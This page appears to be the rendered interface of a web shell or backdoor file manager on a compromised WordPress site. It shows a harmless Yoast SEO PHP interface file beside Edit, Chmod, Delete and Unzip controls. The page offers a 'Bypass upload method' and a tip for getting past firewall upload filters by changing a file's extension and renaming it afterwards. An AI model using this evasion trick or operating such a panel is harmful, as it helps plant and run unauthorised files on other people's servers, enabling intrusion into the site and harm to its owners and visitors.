Search
Search
Search
Search
Information
Information
Light
Dark
Open actions menu
Basic upload method
Bypass upload method
Tips!
If you encounter an error (by firewall) while uploading using both methods,
try changing extension of the file before uploading it and rename it right after.
This uploader supports multiple file upload.
Submit
~
var
www
thinksupport.bitkit.dk
httpdocs
wp-content
plugins
wordpress-seo
src
initializers
File Content:
initializer-interface.php
<?php namespace Yoast\WP\SEO\Initializers; use Yoast\WP\SEO\Loadable_Interface; /** * Integration interface definition. * * An interface for registering integrations with WordPress. */ interface Initializer_Interface extends Loadable_Interface { /** * Runs this initializer. * * @return void */ public function initialize(); }
Edit
Download
Unzip
Chmod
Delete